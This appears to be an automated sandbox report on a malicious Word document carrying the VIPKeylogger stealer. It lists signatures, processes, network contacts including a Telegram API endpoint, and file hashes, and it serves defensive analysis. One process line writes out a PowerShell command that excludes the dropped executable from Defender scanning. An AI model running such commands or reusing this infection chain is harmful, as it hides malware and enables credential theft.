Malware Analysis Report

2025-05-28 14:54

Sample ID 240821-hvdgfavfpf
Target qoute.docx.doc
SHA256 0716b488e853e64c11829ceadc87e805cd1513bcec26a8c261520a36aff87da2
Tags
vipkeylogger collection credential_access discovery execution keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0716b488e853e64c11829ceadc87e805cd1513bcec26a8c261520a36aff87da2

Threat Level: Known bad

The file qoute.docx.doc was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection credential_access discovery execution keylogger spyware stealer

VIPKeylogger

Credentials from Password Stores: Credentials from Web Browsers

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of local email clients

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Abuses OpenXML format to download file from external location

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

outlook_office_path

outlook_win_path

Suspicious use of WriteProcessMemory

Launches Equation Editor

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Enumerates system info in registry

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-21 07:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-21 07:03

Reported

2024-08-21 07:05

Platform

win7-20240704-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3068 set thread context of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2660 wrote to memory of 3068 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 2660 wrote to memory of 3068 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 2660 wrote to memory of 3068 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 2660 wrote to memory of 3068 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 2120 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2120 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2120 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2120 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 3068 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

"C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"

C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

"C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"

Network

Country Destination Domain Proto
US 154.216.18.222:80 154.216.18.222 tcp
US 154.216.18.222:80 154.216.18.222 tcp
US 154.216.18.222:80 154.216.18.222 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

memory/2120-0-0x000000002F711000-0x000000002F712000-memory.dmp

memory/2120-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2120-2-0x00000000710FD000-0x0000000071108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{505CDEC2-D201-4044-AA09-01EAA32752C9}

MD5 6817c35597ce7e0fe21e063774007d46
SHA1 06943e4b806c415323d88f05cbaf4118a75d130d
SHA256 1ae0dea82c5bf51251226b81c300c4b5513e9da185799a30aff0c0fa156149e0
SHA512 8d66c0b46bd5e012d891fd381e549f4a9b3b837adc305f392669aa18aae5e5e107af03acddbc649eb70aeabbb5d2f071726351f17f774fc5bbec121f0b049d6b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{31AA283F-DCA1-4D57-B1E1-8405167C2D04}.FSD

MD5 8de897090a012ddd58bbf68f3c53ca43
SHA1 2450cd9edc40d73502dc87d34691958b9adf798e
SHA256 9ef45dc7cbbff1cc7e6ead6653dcc3729759ab85752155bbfd06e3fc98a8f531
SHA512 d925803c135efeb2980f189ce7d33607445033e47224db74d32a50749697eb7463113cee810e9c835e9eca70a7720f99272f0dea38c387a5482e509358573530

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 ff337769a46bef53eaac5c229102ba78
SHA1 f4a21ef21e2e913947523977f34f442e6d3af7dc
SHA256 b6a32b4f3fcfae403568532326f6a5d810139b1e4e36af290ec888fd03be9926
SHA512 bf8cce105dfa6c0ceb36e058ff3e3c35555bf04217260b8d2b22fde0e5d005e7da2468e753b87a6e9efdc1c3e215d26747f4138224314b873a7d1017338c93d7

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{7D31351A-06EB-469C-A1FC-ACE4C8DE71D7}.FSD

MD5 ef96eb74f78fe0c5e90d2ddcdedd63d9
SHA1 7b4c44efba70d581b7e6eb771fa171de8ffed5d4
SHA256 bf5de6f9f3455fadb7b327a7646ebc1105e2e582e020feb5d0cdf06ed7a77022
SHA512 624a534ee67e73f221de406f26508ca00c95c3150279c2c6ca43e3668bef713b198f2f496a2de2078b783bfe579191f80da87ea1ddc635183a7b3033884c14f8

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\ioqjWeKazzLuiTHfd[1].doc

MD5 16ddde7b45c040f9fb63e73863134f5c
SHA1 ca18b30011b59e341eae8006d05d543e7314ce0c
SHA256 05ad66d563f492c9b527602ff6c7bd9b8fa0ed8f288d0481f51ebe6b71b05242
SHA512 4b6dd4b9fc79ed9639f95eeff4756e3915591fca8265c70c361709f0aa46aec542143d1966cbf746bfc4eb8efd09ccebab9ff5290719025ade090fb8b8fd2c3b

\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

MD5 06ef63fcb30cb75b38e13a0a12764097
SHA1 fbf8ee77153177587ef1e81e36cb4adad054d208
SHA256 23b9b4a46c15c5fa3b7445e8041852f3dc831547903250209ca738b1a17fb7c2
SHA512 833722edea13277437343fd24cdfdd2b99a5c8d909a68421ee65bb0e0bbefa41aef183340cce4991d55c21d505e6bfc7e6bb429ccbb10bcdf619669e800b42d2

memory/3068-94-0x0000000000A50000-0x0000000000B06000-memory.dmp

memory/3068-96-0x0000000000520000-0x0000000000532000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2120-103-0x00000000710FD000-0x0000000071108000-memory.dmp

memory/3068-104-0x0000000000530000-0x0000000000540000-memory.dmp

memory/3068-105-0x0000000004BD0000-0x0000000004C5A000-memory.dmp

memory/2700-118-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-117-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-115-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-114-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2700-112-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-110-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-108-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-107-0x0000000000400000-0x0000000000448000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 e78e5f1a5efafcec6e2cdfa6e0ac32a4
SHA1 e2b0d742dbe54699055b4a5265f34b92a8c685bd
SHA256 4114ba504ef39436f9a1ed81b757911ee206b0bba1f1fb7f40b928120d9d7ec5
SHA512 e39eed4d217e917def475edf063153a7d7f47a76e16bdb20fb7a470369e0d78161914cdbb5f19ae9b05e317740e4b4fc0620ebb4cf75ea21ecfe6329c353ec7c

memory/2120-143-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2120-144-0x00000000710FD000-0x0000000071108000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-21 07:03

Reported

2024-08-21 07:05

Platform

win10v2004-20240802-en

Max time kernel

101s

Max time network

125s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 154.216.18.222:80 154.216.18.222 tcp
US 154.216.18.222:80 154.216.18.222 tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 222.18.216.154.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 23.40.43.41:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 41.43.40.23.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 57.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/2640-1-0x00007FFD9C44D000-0x00007FFD9C44E000-memory.dmp

memory/2640-0-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-3-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-2-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-4-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-5-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-9-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-8-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-7-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-10-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-11-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-12-0x00007FFD59E10000-0x00007FFD59E20000-memory.dmp

memory/2640-6-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-13-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-15-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-18-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-19-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-23-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-22-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-21-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-20-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-17-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-16-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-14-0x00007FFD59E10000-0x00007FFD59E20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\JACP9GNT\ioqjWeKazzLuiTHfd[1].doc

MD5 16ddde7b45c040f9fb63e73863134f5c
SHA1 ca18b30011b59e341eae8006d05d543e7314ce0c
SHA256 05ad66d563f492c9b527602ff6c7bd9b8fa0ed8f288d0481f51ebe6b71b05242
SHA512 4b6dd4b9fc79ed9639f95eeff4756e3915591fca8265c70c361709f0aa46aec542143d1966cbf746bfc4eb8efd09ccebab9ff5290719025ade090fb8b8fd2c3b

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 b5571b930ae7048b8dd0a015ff940c54
SHA1 7b54ab2c1210a0b609d51ef04d4b70327e638503
SHA256 e419717843023498c099bb2eb833f81c6f55cf3f9d83a98f0b7cf0d7a483a9d2
SHA512 48096e5b10003ee38939912a4c93bc17103dace6bbc12d27dcce85ddbc0fc7e72e16edde95dd195bf77aa716c3f6b834c4e52aa9029962dbcf5d88495dff536e

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2640-83-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-85-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-84-0x00007FFD9C44D000-0x00007FFD9C44E000-memory.dmp

memory/2640-86-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDE59A.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

memory/2640-595-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-596-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-598-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-597-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-599-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp